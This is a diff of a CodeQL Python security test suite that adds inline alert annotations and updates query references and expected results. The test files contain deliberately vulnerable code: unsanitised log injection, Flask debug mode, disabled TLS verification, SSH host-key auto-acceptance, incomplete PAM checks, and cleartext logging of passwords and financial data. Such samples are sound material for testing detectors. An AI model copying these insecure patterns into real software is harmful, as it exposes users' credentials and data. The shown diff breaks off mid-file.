ControlFlowNode for ImportMember | user-provided value | edges | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for request | provenance | | | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for request | LogInjectionBad.py:17:12:17:18 | ControlFlowNode for request | provenance | | @@ -44,8 +49,3 @@ nodes | LogInjectionBad.py:35:12:35:35 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | subpaths -#select -| LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | -| LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | -| LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | -| LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.qlref b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.qlref index 1837c628c33e..fc8a61c453d2 100644 --- a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.qlref @@ -1 +1,2 @@ -Security/CWE-117/LogInjection.ql +query: Security/CWE-117/LogInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjectionBad.py b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjectionBad.py index 0c0cbe1a8fee..a2b5dc7eec06 100644 --- a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjectionBad.py +++ b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjectionBad.py @@ -4,7 +4,7 @@ @Desc :Log Injection """ from flask import Flask -from flask import request +from flask import request # $ Source from django.utils.log import request_logger import logging @@ -15,26 +15,26 @@ @app.route('/bad1') def bad1(): name = request.args.get('name') - app.logger.info('User name: ' + name) # Bad + app.logger.info('User name: ' + name) # Bad # $ Alert return 'bad1' @app.route('/bad2') def bad2(): name = request.args.get('name') - logging.info('User name: ' + name) # Bad + logging.info('User name: ' + name) # Bad # $ Alert return 'bad2' @app.route('/bad3') def bad3(): name = request.args.get('name') - request_logger.warn('User name: ' + name) # Bad + request_logger.warn('User name: ' + name) # Bad # $ Alert return 'bad3' @app.route('/bad4') def bad4(): name = request.args.get('name') logtest = logging.getLogger('test') - logtest.debug('User name: ' + name) # Bad + logtest.debug('User name: ' + name) # Bad # $ Alert return 'bad4' if __name__ == '__main__': diff --git a/python/ql/test/query-tests/Security/CWE-209-StackTraceExposure/StackTraceExposure.qlref b/python/ql/test/query-tests/Security/CWE-209-StackTraceExposure/StackTraceExposure.qlref index 18cf2d49a1aa..1dd7d31abad3 100644 --- a/python/ql/test/query-tests/Security/CWE-209-StackTraceExposure/StackTraceExposure.qlref +++ b/python/ql/test/query-tests/Security/CWE-209-StackTraceExposure/StackTraceExposure.qlref @@ -1 +1 @@ -Security/CWE-209/StackTraceExposure.ql +query: Security/CWE-209/StackTraceExposure.ql diff --git a/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/FlaskDebug.qlref b/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/FlaskDebug.qlref index 0e21a3ac14fe..0fad5641329e 100644 --- a/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/FlaskDebug.qlref +++ b/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/FlaskDebug.qlref @@ -1 +1,2 @@ -Security/CWE-215/FlaskDebug.ql +query: Security/CWE-215/FlaskDebug.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/test.py b/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/test.py index c1d653aab937..65435cde31ae 100644 --- a/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/test.py +++ b/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/test.py @@ -7,8 +7,8 @@ def main(): raise Exception() # bad -app.run(debug=True) -app.run('host', 8080, True) +app.run(debug=True) # $ Alert +app.run('host', 8080, True) # $ Alert # okay app.run() @@ -23,11 +23,11 @@ def main(): DEBUG = True -app.run(debug=DEBUG) # NOT OK +app.run(debug=DEBUG) # NOT OK # $ Alert DEBUG = 1 -app.run(debug=DEBUG) # NOT OK +app.run(debug=DEBUG) # NOT OK # $ Alert if False: app.run(debug=True) @@ -35,12 +35,12 @@ def main(): runapp = app.run -runapp(debug=True) # NOT OK +runapp(debug=True) # NOT OK # $ Alert # imports from other module import settings -app.run(debug=settings.ALWAYS_TRUE) # NOT OK +app.run(debug=settings.ALWAYS_TRUE) # NOT OK # $ Alert # depending on environment values diff --git a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected index 8031d3070c94..99114d85cfbd 100644 --- a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected +++ b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected @@ -1,3 +1,5 @@ +#select +| pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | This PAM authentication depends on a $@, and 'pam_acct_mgmt' is not called afterwards. | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | user-provided value | edges | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | pam_test.py:4:26:4:32 | ControlFlowNode for request | provenance | | | pam_test.py:4:26:4:32 | ControlFlowNode for request | pam_test.py:71:16:71:22 | ControlFlowNode for request | provenance | | @@ -20,5 +22,3 @@ nodes | pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | semmle.label | ControlFlowNode for pam_authenticate() | | pam_test.py:76:31:76:36 | ControlFlowNode for handle | semmle.label | ControlFlowNode for handle | subpaths -#select -| pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | This PAM authentication depends on a $@, and 'pam_acct_mgmt' is not called afterwards. | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.qlref b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.qlref index 81915461d7ad..de31c362b6ca 100644 --- a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.qlref +++ b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.qlref @@ -1 +1,2 @@ -Security/CWE-285/PamAuthorization.ql +query: Security/CWE-285/PamAuthorization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/pam_test.py b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/pam_test.py index f16e3c9941ea..364b2a64f7da 100644 --- a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/pam_test.py +++ b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/pam_test.py @@ -1,7 +1,7 @@ from ctypes import CDLL, POINTER, Structure, byref from ctypes import c_char_p, c_int from ctypes.util import find_library -from flask import Flask, request, redirect +from flask import Flask, request, redirect # $ Source class PamHandle(Structure): @@ -73,7 +73,7 @@ def bad(): conv = PamConv(None, 0) retval = pam_start(service, username, byref(conv), byref(handle)) - retval = pam_authenticate(handle, 0) + retval = pam_authenticate(handle, 0) # $ Alert # NOT OK: no call to `pam_acct_mgmt` auth_success = retval == 0 diff --git a/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/MissingHostKeyValidation.qlref b/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/MissingHostKeyValidation.qlref index c366095516af..5b75b5eea103 100644 --- a/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/MissingHostKeyValidation.qlref +++ b/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/MissingHostKeyValidation.qlref @@ -1 +1,2 @@ -Security/CWE-295/MissingHostKeyValidation.ql +query: Security/CWE-295/MissingHostKeyValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/paramiko_host_key.py b/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/paramiko_host_key.py index 3d0a59dcd8f9..6513b81fbcbb 100644 --- a/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/paramiko_host_key.py +++ b/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/paramiko_host_key.py @@ -2,19 +2,19 @@ client = SSHClient() -client.set_missing_host_key_policy(AutoAddPolicy) # bad +client.set_missing_host_key_policy(AutoAddPolicy) # bad # $ Alert client.set_missing_host_key_policy(RejectPolicy) # good -client.set_missing_host_key_policy(WarningPolicy) # bad +client.set_missing_host_key_policy(WarningPolicy) # bad # $ Alert # Using instances -client.set_missing_host_key_policy(AutoAddPolicy()) # bad +client.set_missing_host_key_policy(AutoAddPolicy()) # bad # $ Alert client.set_missing_host_key_policy(RejectPolicy()) # good -client.set_missing_host_key_policy(WarningPolicy()) # bad +client.set_missing_host_key_policy(WarningPolicy()) # bad # $ Alert # different import import paramiko client = paramiko.SSHClient() -client.set_missing_host_key_policy(paramiko.AutoAddPolicy) # bad +client.set_missing_host_key_policy(paramiko.AutoAddPolicy) # bad # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/RequestWithoutValidation.qlref b/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/RequestWithoutValidation.qlref index 7ad4d4d2ae34..cda6ce83c836 100644 --- a/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/RequestWithoutValidation.qlref +++ b/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/RequestWithoutValidation.qlref @@ -1 +1,2 @@ -Security/CWE-295/RequestWithoutValidation.ql +query: Security/CWE-295/RequestWithoutValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/make_request.py b/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/make_request.py index 29e857e07b1c..e907fd281f5a 100644 --- a/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/make_request.py +++ b/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/make_request.py @@ -2,14 +2,14 @@ #Simple cases requests.get('https://semmle.com', verify=True) # GOOD -requests.get('https://semmle.com', verify=False) # BAD +requests.get('https://semmle.com', verify=False) # BAD # $ Alert requests.post('https://semmle.com', verify=True) # GOOD -requests.post('https://semmle.com', verify=False) # BAD +requests.post('https://semmle.com', verify=False) # BAD # $ Alert # Simple flow put = requests.put put('https://semmle.com', verify="/path/to/cert/") # GOOD -put('https://semmle.com', verify=False) # BAD +put('https://semmle.com', verify=False) # BAD # $ Alert #Other flow delete = requests.delete @@ -25,17 +25,17 @@ def req1(verify=False): patch = requests.patch def req2(verify): - patch('https://semmle.com', verify=verify) # BAD (from line 30) + patch('https://semmle.com', verify=verify) # BAD (from line 30) # $ Alert req2(False) # BAD (at line 28) req2("/path/to/cert/") # GOOD #Falsey value -requests.post('https://semmle.com', verify=0) # BAD +requests.post('https://semmle.com', verify=0) # BAD # $ Alert # requests treat `None` as default value, which means it is turned on requests.get('https://semmle.com') # OK requests.get('https://semmle.com', verify=None) # OK s = requests.Session() -s.get("url", verify=False) # BAD +s.get("url", verify=False) # BAD # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected index 5da1b60eee12..47f27dbc5f27 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected @@ -1,3 +1,28 @@ +#select +| test.py:20:48:20:55 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:20:48:20:55 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:22:58:22:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:22:58:22:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:23:58:23:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:23:58:23:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:27:40:27:47 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:27:40:27:47 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:30:58:30:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:30:58:30:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:37:11:37:24 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:39:22:39:35 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:40:22:40:35 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:45:11:45:11 | ControlFlowNode for x | test.py:44:9:44:25 | ControlFlowNode for Attribute() | test.py:45:11:45:11 | ControlFlowNode for x | This expression logs $@ as clear text. | test.py:44:9:44:25 | ControlFlowNode for Attribute() | sensitive data (password) | +| test.py:49:15:49:36 | ControlFlowNode for social_security_number | test.py:48:14:48:35 | ControlFlowNode for social_security_number | test.py:49:15:49:36 | ControlFlowNode for social_security_number | This expression logs $@ as clear text. | test.py:48:14:48:35 | ControlFlowNode for social_security_number | sensitive data (private) | +| test.py:50:15:50:17 | ControlFlowNode for ssn | test.py:48:38:48:40 | ControlFlowNode for ssn | test.py:50:15:50:17 | ControlFlowNode for ssn | This expression logs $@ as clear text. | test.py:48:38:48:40 | ControlFlowNode for ssn | sensitive data (private) | +| test.py:52:15:52:24 | ControlFlowNode for passportNo | test.py:48:54:48:63 | ControlFlowNode for passportNo | test.py:52:15:52:24 | ControlFlowNode for passportNo | This expression logs $@ as clear text. | test.py:48:54:48:63 | ControlFlowNode for passportNo | sensitive data (private) | +| test.py:55:15:55:23 | ControlFlowNode for post_code | test.py:54:14:54:22 | ControlFlowNode for post_code | test.py:55:15:55:23 | ControlFlowNode for post_code | This expression logs $@ as clear text. | test.py:54:14:54:22 | ControlFlowNode for post_code | sensitive data (private) | +| test.py:56:15:56:21 | ControlFlowNode for zipCode | test.py:54:25:54:31 | ControlFlowNode for zipCode | test.py:56:15:56:21 | ControlFlowNode for zipCode | This expression logs $@ as clear text. | test.py:54:25:54:31 | ControlFlowNode for zipCode | sensitive data (private) | +| test.py:57:15:57:26 | ControlFlowNode for home_address | test.py:54:34:54:45 | ControlFlowNode for home_address | test.py:57:15:57:26 | ControlFlowNode for home_address | This expression logs $@ as clear text. | test.py:54:34:54:45 | ControlFlowNode for home_address | sensitive data (private) | +| test.py:60:15:60:27 | ControlFlowNode for user_latitude | test.py:59:14:59:26 | ControlFlowNode for user_latitude | test.py:60:15:60:27 | ControlFlowNode for user_latitude | This expression logs $@ as clear text. | test.py:59:14:59:26 | ControlFlowNode for user_latitude | sensitive data (private) | +| test.py:61:15:61:28 | ControlFlowNode for user_longitude | test.py:59:29:59:42 | ControlFlowNode for user_longitude | test.py:61:15:61:28 | ControlFlowNode for user_longitude | This expression logs $@ as clear text. | test.py:59:29:59:42 | ControlFlowNode for user_longitude | sensitive data (private) | +| test.py:64:15:64:27 | ControlFlowNode for mobile_number | test.py:63:14:63:26 | ControlFlowNode for mobile_number | test.py:64:15:64:27 | ControlFlowNode for mobile_number | This expression logs $@ as clear text. | test.py:63:14:63:26 | ControlFlowNode for mobile_number | sensitive data (private) | +| test.py:65:15:65:21 | ControlFlowNode for phoneNo | test.py:63:29:63:35 | ControlFlowNode for phoneNo | test.py:65:15:65:21 | ControlFlowNode for phoneNo | This expression logs $@ as clear text. | test.py:63:29:63:35 | ControlFlowNode for phoneNo | sensitive data (private) | +| test.py:68:15:68:24 | ControlFlowNode for creditcard | test.py:67:14:67:23 | ControlFlowNode for creditcard | test.py:68:15:68:24 | ControlFlowNode for creditcard | This expression logs $@ as clear text. | test.py:67:14:67:23 | ControlFlowNode for creditcard | sensitive data (private) | +| test.py:69:15:69:24 | ControlFlowNode for debit_card | test.py:67:26:67:35 | ControlFlowNode for debit_card | test.py:69:15:69:24 | ControlFlowNode for debit_card | This expression logs $@ as clear text. | test.py:67:26:67:35 | ControlFlowNode for debit_card | sensitive data (private) | +| test.py:70:15:70:25 | ControlFlowNode for bank_number | test.py:67:38:67:48 | ControlFlowNode for bank_number | test.py:70:15:70:25 | ControlFlowNode for bank_number | This expression logs $@ as clear text. | test.py:67:38:67:48 | ControlFlowNode for bank_number | sensitive data (private) | +| test.py:73:15:73:17 | ControlFlowNode for ccn | test.py:67:76:67:78 | ControlFlowNode for ccn | test.py:73:15:73:17 | ControlFlowNode for ccn | This expression logs $@ as clear text. | test.py:67:76:67:78 | ControlFlowNode for ccn | sensitive data (private) | +| test.py:74:15:74:22 | ControlFlowNode for user_ccn | test.py:67:81:67:88 | ControlFlowNode for user_ccn | test.py:74:15:74:22 | ControlFlowNode for user_ccn | This expression logs $@ as clear text. | test.py:67:81:67:88 | ControlFlowNode for user_ccn | sensitive data (private) | edges | test.py:19:5:19:12 | ControlFlowNode for password | test.py:20:48:20:55 | ControlFlowNode for password | provenance | | | test.py:19:5:19:12 | ControlFlowNode for password | test.py:22:58:22:65 | ControlFlowNode for password | provenance | | @@ -67,28 +92,3 @@ nodes | test.py:73:15:73:17 | ControlFlowNode for ccn | semmle.label | ControlFlowNode for ccn | | test.py:74:15:74:22 | ControlFlowNode for user_ccn | semmle.label | ControlFlowNode for user_ccn | subpaths -#select -| test.py:20:48:20:55 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:20:48:20:55 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:22:58:22:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:22:58:22:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:23:58:23:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:23:58:23:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:27:40:27:47 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:27:40:27:47 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:30:58:30:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:30:58:30:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:37:11:37:24 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:39:22:39:35 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:40:22:40:35 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:45:11:45:11 | ControlFlowNode for x | test.py:44:9:44:25 | ControlFlowNode for Attribute() | test.py:45:11:45:11 | ControlFlowNode for x | This expression logs $@ as clear text. | test.py:44:9:44:25 | ControlFlowNode for Attribute() | sensitive data (password) | -| test.py:49:15:49:36 | ControlFlowNode for social_security_number | test.py:48:14:48:35 | ControlFlowNode for social_security_number | test.py:49:15:49:36 | ControlFlowNode for social_security_number | This expression logs $@ as clear text. | test.py:48:14:48:35 | ControlFlowNode for social_security_number | sensitive data (private) | -| test.py:50:15:50:17 | ControlFlowNode for ssn | test.py:48:38:48:40 | ControlFlowNode for ssn | test.py:50:15:50:17 | ControlFlowNode for ssn | This expression logs $@ as clear text. | test.py:48:38:48:40 | ControlFlowNode for ssn | sensitive data (private) | -| test.py:52:15:52:24 | ControlFlowNode for passportNo | test.py:48:54:48:63 | ControlFlowNode for passportNo | test.py:52:15:52:24 | ControlFlowNode for passportNo | This expression logs $@ as clear text. | test.py:48:54:48:63 | ControlFlowNode for passportNo | sensitive data (private) | -| test.py:55:15:55:23 | ControlFlowNode for post_code | test.py:54:14:54:22 | ControlFlowNode for post_code | test.py:55:15:55:23 | ControlFlowNode for post_code | This expression logs $@ as clear text. | test.py:54:14:54:22 | ControlFlowNode for post_code | sensitive data (private) | -| test.py:56:15:56:21 | ControlFlowNode for zipCode | test.py:54:25:54:31 | ControlFlowNode for zipCode | test.py:56:15:56:21 | ControlFlowNode for zipCode | This expression logs $@ as clear text. | test.py:54:25:54:31 | ControlFlowNode for zipCode | sensitive data (private) | -| test.py:57:15:57:26 | ControlFlowNode for home_address | test.py:54:34:54:45 | ControlFlowNode for home_address | test.py:57:15:57:26 | ControlFlowNode for home_address | This expression logs $@ as clear text. | test.py:54:34:54:45 | ControlFlowNode for home_address | sensitive data (private) | -| test.py:60:15:60:27 | ControlFlowNode for user_latitude | test.py:59:14:59:26 | ControlFlowNode for user_latitude | test.py:60:15:60:27 | ControlFlowNode for user_latitude | This expression logs $@ as clear text. | test.py:59:14:59:26 | ControlFlowNode for user_latitude | sensitive data (private) | -| test.py:61:15:61:28 | ControlFlowNode for user_longitude | test.py:59:29:59:42 | ControlFlowNode for user_longitude | test.py:61:15:61:28 | ControlFlowNode for user_longitude | This expression logs $@ as clear text. | test.py:59:29:59:42 | ControlFlowNode for user_longitude | sensitive data (private) | -| test.py:64:15:64:27 | ControlFlowNode for mobile_number | test.py:63:14:63:26 | ControlFlowNode for mobile_number | test.py:64:15:64:27 | ControlFlowNode for mobile_number | This expression logs $@ as clear text. | test.py:63:14:63:26 | ControlFlowNode for mobile_number | sensitive data (private) | -| test.py:65:15:65:21 | ControlFlowNode for phoneNo | test.py:63:29:63:35 | ControlFlowNode for phoneNo | test.py:65:15:65:21 | ControlFlowNode for phoneNo | This expression logs $@ as clear text. | test.py:63:29:63:35 | ControlFlowNode for phoneNo | sensitive data (private) | -| test.py:68:15:68:24 | ControlFlowNode for creditcard | test.py:67:14:67:23 | ControlFlowNode for creditcard | test.py:68:15:68:24 | ControlFlowNode for creditcard | This expression logs $@ as clear text. | test.py:67:14:67:23 | ControlFlowNode for creditcard | sensitive data (private) | -| test.py:69:15:69:24 | ControlFlowNode for debit_card | test.py:67:26:67:35 | ControlFlowNode for debit_card | test.py:69:15:69:24 | ControlFlowNode for debit_card | This expression logs $@ as clear text. | test.py:67:26:67:35 | ControlFlowNode for debit_card | sensitive data (private) | -| test.py:70:15:70:25 | ControlFlowNode for bank_number | test.py:67:38:67:48 | ControlFlowNode for bank_number | test.py:70:15:70:25 | ControlFlowNode for bank_number | This expression logs $@ as clear text. | test.py:67:38:67:48 | ControlFlowNode for bank_number | sensitive data (private) | -| test.py:73:15:73:17 | ControlFlowNode for ccn | test.py:67:76:67:78 | ControlFlowNode for ccn | test.py:73:15:73:17 | ControlFlowNode for ccn | This expression logs $@ as clear text. | test.py:67:76:67:78 | ControlFlowNode for ccn | sensitive data (private) | -| test.py:74:15:74:22 | ControlFlowNode for user_ccn | test.py:67:81:67:88 | ControlFlowNode for user_ccn | test.py:74:15:74:22 | ControlFlowNode for user_ccn | This expression logs $@ as clear text. | test.py:67:81:67:88 | ControlFlowNode for user_ccn | sensitive data (private) | diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.qlref b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.qlref index de9273391c84..2309f8c643a1 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.qlref +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.qlref @@ -1 +1,2 @@ -Security/CWE-312/CleartextLogging.ql \ No newline at end of file +query: Security/CWE-312/CleartextLogging.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/test.py b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/test.py index ff01680ed81c..65812b9ebd6c 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/test.py +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/test.py @@ -16,62 +16,62 @@ def get_cert(): def log_password(): - password = get_password() - logging.info("logging.info Password '%s'", password) # NOT OK + password = get_password() # $ Source + logging.info("logging.info Password '%s'", password) # NOT OK # $ Alert - LOGGER.log(logging.INFO, "LOGGER.log Password '%s'", password) # NOT OK - logging.root.info("logging.root.info Password '%s'", password) # NOT OK + LOGGER.log(logging.INFO, "LOGGER.log Password '%s'", password) # NOT OK # $ Alert + logging.root.info("logging.root.info Password '%s'", password) # NOT OK # $ Alert # name of logger variable should not matter foo = LOGGER - foo.info("foo.info Password '%s'", password) # NOT OK + foo.info("foo.info Password '%s'", password) # NOT OK # $ Alert # return value from function - get_logger().info("get_logger().info Password '%s'", password) # NOT OK + get_logger().info("get_logger().info Password '%s'", password) # NOT OK # $ Alert def log_cert(): logging.debug("Cert=%s", get_cert()) # OK def print_password(): - print(get_password()) # NOT OK + print(get_password()) # NOT OK # $ Alert - sys.stdout.write(get_password()) # NOT OK - sys.stderr.write(get_password()) # NOT OK + sys.stdout.write(get_password()) # NOT OK # $ Alert + sys.stderr.write(get_password()) # NOT OK # $ Alert import getpass - x = getpass.getpass() - print(x) # NOT OK + x = getpass.getpass() # $ Source + print(x) # NOT OK # $ Alert def log_private(): - def log1(social_security_number, ssn, className, passportNo): - print(social_security_number) # NOT OK - print(ssn) # NOT OK + def log1(social_security_number, ssn, className, passportNo): # $ Source + print(social_security_number) # NOT OK # $ Alert + print(ssn) # NOT OK # $ Alert print(className) # OK - print(passportNo) # NOT OK + print(passportNo) # NOT OK # $ Alert - def log2(post_code, zipCode, home_address): - print(post_code) # NOT OK - print(zipCode) # NOT OK - print(home_address) # NOT OK + def log2(post_code, zipCode, home_address): # $ Source + print(post_code) # NOT OK # $ Alert + print(zipCode) # NOT OK # $ Alert + print(home_address) # NOT OK # $ Alert - def log3(user_latitude, user_longitude): - print(user_latitude) # NOT OK - print(user_longitude) # NOT OK + def log3(user_latitude, user_longitude): # $ Source + print(user_latitude) # NOT OK # $ Alert + print(user_longitude) # NOT OK # $ Alert - def log4(mobile_number, phoneNo): - print(mobile_number) # NOT OK - print(phoneNo) # NOT OK + def log4(mobile_number, phoneNo): # $ Source + print(mobile_number) # NOT OK # $ Alert + print(phoneNo) # NOT OK # $ Alert - def log5(creditcard, debit_card, bank_number, bank_account, accountNo, ccn, user_ccn, succNode): - print(creditcard) # NOT OK - print(debit_card) # NOT OK - print(bank_number) # NOT OK + def log5(creditcard, debit_card, bank_number, bank_account, accountNo, ccn, user_ccn, succNode): # $ Source + 